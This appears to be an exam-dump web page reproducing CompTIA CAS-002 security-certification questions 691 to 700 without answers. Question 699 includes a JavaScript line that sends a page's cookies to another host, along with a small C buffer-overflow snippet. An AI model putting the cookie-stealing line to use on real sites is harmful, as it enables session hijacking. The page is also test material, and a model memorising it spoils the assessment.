CAS-002 Exam Details

  • Exam Code
    :CAS-002
  • Exam Name
    :CompTIA Advanced Security Practitioner (CASP+)
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :733 Q&As
  • Last Updated
    :Jan 22, 2024

CompTIA CAS-002 Online Questions & Answers

  • Question 691:

    A company has recently implemented a video conference solution that uses the H.323 protocol. The security engineer is asked to make recommendations on how to secure video conferences to protect confidentiality. Which of the following should the security engineer recommend?

    A. Implement H.235 extensions with DES to secure the audio and video transport.
    B. Recommend moving to SIP and RTP as those protocols are inherently secure.
    C. Recommend implementing G.711 for the audio channel and H.264 for the video.
    D. Encapsulate the audio channel in the G.711 codec rather than the unsecured Speex.

  • Question 692:

    A security administrator wants to verify and improve the security of a business process which is tied to proven company workflow. The security administrator was able to improve security by applying controls that were defined by the newly released company security standard. Such controls included code improvement, transport encryption, and interface restrictions. Which of the following can the security administrator do to further increase security after having exhausted all the technical controls dictated by the company's security standard?

    A. Modify the company standard to account for higher security and meet with upper management for approval to implement the new standard.
    B. Conduct a gap analysis and recommend appropriate non-technical mitigating controls, and incorporate the new controls into the standard.
    C. Conduct a risk analysis on all current controls, and recommend appropriate mechanisms to increase overall security.
    D. Modify the company policy to account for higher security, adapt the standard accordingly, and implement new technical controls.

  • Question 693:

    ABC Company must achieve compliance for PCI and SOX. Which of the following would BEST allow the organization to achieve compliance and ensure security? (Select THREE).

    A. Establish a list of users that must work with each regulation
    B. Establish a list of devices that must meet each regulation
    C. Centralize management of all devices on the network
    D. Compartmentalize the network
    E. Establish a company framework
    F. Apply technical controls to meet compliance with the regulation

  • Question 694:

    News outlets are beginning to report on a number of retail establishments that are experiencing payment card data breaches. The data exfiltration is enabled by malware on a compromised computer. After the initial exploit, network mapping and fingerprinting is conducted to prepare for further exploitation. Which of the following is the MOST effective solution to protect against unrecognized malware infections?

    A. Remove local admin permissions from all users and change anti-virus to a cloud aware, push technology.
    B. Implement an application whitelist at all levels of the organization.
    C. Deploy a network based heuristic IDS, configure all layer 3 switches to feed data to the IDS for more effective monitoring.
    D. Update router configuration to pass all network traffic through a new proxy server with advanced malware detection.

  • Question 695:

    A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card details. Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input?

    A. Client side input validation
    B. Stored procedure
    C. Encrypting credit card details
    D. Regular expression matching

  • Question 696:

    Company GHI consolidated their network distribution so twelve network VLANs would be available over dual fiber links to a modular L2 switch in each of the company's six IDFs. The IDF modular switches have redundant switch fabrics and power supplies. Which of the following threats will have the GREATEST impact on the network and what is the appropriate remediation step?

    A. Threat: 802.1q trunking attack Remediation: Enable only necessary VLANs for each port
    B. Threat: Bridge loop Remediation: Enable spanning tree
    C. Threat: VLAN hopping Remediation: Enable only necessary VLANs for each port
    D. Threat: VLAN hopping Remediation: Enable ACLs on the IDF switch

  • Question 697:

    A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network. The company has already implemented full-disk encryption and has disabled all peripheral devices on its desktops and laptops. Which of the following additional controls MUST be implemented to minimize the risk of data leakage? (Select TWO).

    A. A full-system backup should be implemented to a third-party provider with strong encryption for data in transit.
    B. A DLP gateway should be installed at the company border.
    C. Strong authentication should be implemented via external biometric devices.
    D. Full-tunnel VPN should be required for all network communication.
    E. Full-drive file hashing should be implemented with hashes stored on separate storage.
    F. Split-tunnel VPN should be enforced when transferring sensitive data.

  • Question 698:

    After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web based shopping cart.

    SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);

    The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable

    and a timestamp in the form of MM-DD-YYYY, (e.g. smartphone-12-25- 2013.tmp) containing the price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart's items?

    A. Input validation
    B. SQL injection
    C. TOCTOU
    D. Session hijacking

  • Question 699:

    Which of the following displays an example of a buffer overflow attack?

    A. document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie
    B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb
    C. #include char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes void main() {char buf[8]; strcpy(buf, code); }
    D. Username: PassworD.

  • Question 700:

    A WAF without customization will protect the infrastructure from which of the following attack combinations?

    A. DDoS, DNS poisoning, Boink, Teardrop
    B. Reflective XSS, HTTP exhaustion, Teardrop
    C. SQL Injection, DOM based XSS, HTTP exhaustion
    D. SQL Injection, CSRF, Clickjacking

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CAS-002 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.